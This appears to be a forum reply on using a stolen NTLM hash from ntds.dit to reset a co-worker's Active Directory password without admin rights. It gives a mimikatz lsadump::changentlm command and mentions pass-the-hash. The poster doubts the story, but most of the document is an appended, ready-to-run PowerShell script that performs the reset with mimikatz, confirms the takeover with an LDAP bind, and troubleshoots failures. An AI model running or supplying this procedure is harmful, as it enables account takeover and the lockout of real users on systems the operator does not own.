01-03-2020, 09:43 AM
(This post was last modified: 01-03-2020, 10:01 AM by DanielG. Edit Reason: clarification)
I don't get what your goal is here; any domain admin can change the password of the account, so that is your best option.
You don't need to crack the NTLM hash for most other 'less-ethical' use cases (pass-the-hash attacks). The NTLM hash can be used to do a lot of things (for example, authenticate to those devices).
Anyway, if you have the current NTLM hash and want to change the password in the AD (and for some reason you are not an admin), use this:
https://blog.stealthbits.com/manipulatin...ChangeNTLM
You can use mimikatz to run the command lsadump::changentlm /server:that.ad.server.of.yours /user:co-worker /old:extracted.ntlm.from.ntds.dit /newpassword:TurboMatt from any connected computer (you can also do the same with DSInternals, which you already used).
But again, this is a weird story considering any administrator can change the account password.
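The hash-based password change described in the post above, written out as a checked procedure. This is an added example and is not DanielG's code or part of mimikatz or DSInternals; the DC name, account name, mimikatz path and the old hash value are placeholders you replace with your own. It uses DSInternals only for ConvertTo-NTHash (to sanity-check the hashes) and mimikatz lsadump::changentlm for the change itself, then confirms the result with an independent LDAP bind as the account.

```powershell
# Added example (not from the original post): change a domain account's password when you
# hold only its current NT hash, via mimikatz lsadump::changentlm, then verify the change.
# All values below are assumptions/placeholders; replace them with your own.
Import-Module DSInternals   # provides ConvertTo-NTHash

$Server      = 'dc01.corp.local'                      # assumption: FQDN of a writable DC
$User        = 'co-worker'                            # assumption: sAMAccountName of the target
$OldNtHash   = '00000000000000000000000000000000'     # placeholder: the hash extracted from ntds.dit
$NewPassword = 'TurboMatt'
$Mimikatz    = 'C:\Tools\mimikatz.exe'                # assumption: local path to mimikatz.exe

# 1. Check the hash format before touching the DC: an NT hash is 16 bytes, i.e. 32 hex chars.
#    A leading/trailing space or a pasted LM:NT pair is the usual reason changentlm fails.
if ($OldNtHash -notmatch '^[0-9a-fA-F]{32}$') {
    throw 'Old NT hash must be exactly 32 hex characters (NT part only, no LM hash, no colon)'
}

# 2. Compute the NT hash the DC will store afterwards (MD4 over the UTF-16LE password).
#    Comparing it with the old hash catches the trivial case where the "new" password is the
#    current one, which the DC would refuse anyway because of password history.
$NewNtHash = ConvertTo-NTHash -Password (ConvertTo-SecureString $NewPassword -AsPlainText -Force)
if ($NewNtHash -eq $OldNtHash) {
    throw 'New password hashes to the current hash; the change would be rejected'
}

# 3. Perform the change. changentlm proves knowledge of the current password with the old hash,
#    so no cracking and no admin rights are needed, but the DC still enforces the domain password
#    policy (length, complexity, history, minimum password age) on the new password, and /old
#    must be the hash that is current right now, not one from a stale ntds.dit copy.
$Cmd = "lsadump::changentlm /server:$Server /user:$User /old:$OldNtHash /newpassword:$NewPassword"
& $Mimikatz $Cmd 'exit' | Write-Host

# 4. Verify independently of mimikatz's output: a plain bind as the account with the new password.
#    Assumption: the DC's DNS suffix is the domain name, so the UPN is user@suffix.
$Domain = ($Server -split '\.', 2)[1]
$Entry  = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server", "$User@$Domain", $NewPassword)
try {
    $null = $Entry.NativeObject          # forces the bind; throws on a bad password
    Write-Host "Bind as $User with the new password succeeded; NT hash is now $NewNtHash"
}
catch {
    throw "Bind failed, the password change did not take effect: $($_.Exception.Message)"
}
```

If step 3 reports a wrong-password style error, the hash you passed as /old is not the account's current one (the ntds.dit copy predates a password change, or you pasted the LM half); if the bind in step 4 fails while mimikatz looked happy, check the domain password policy, since a change rejected for minimum age or history is the usual cause.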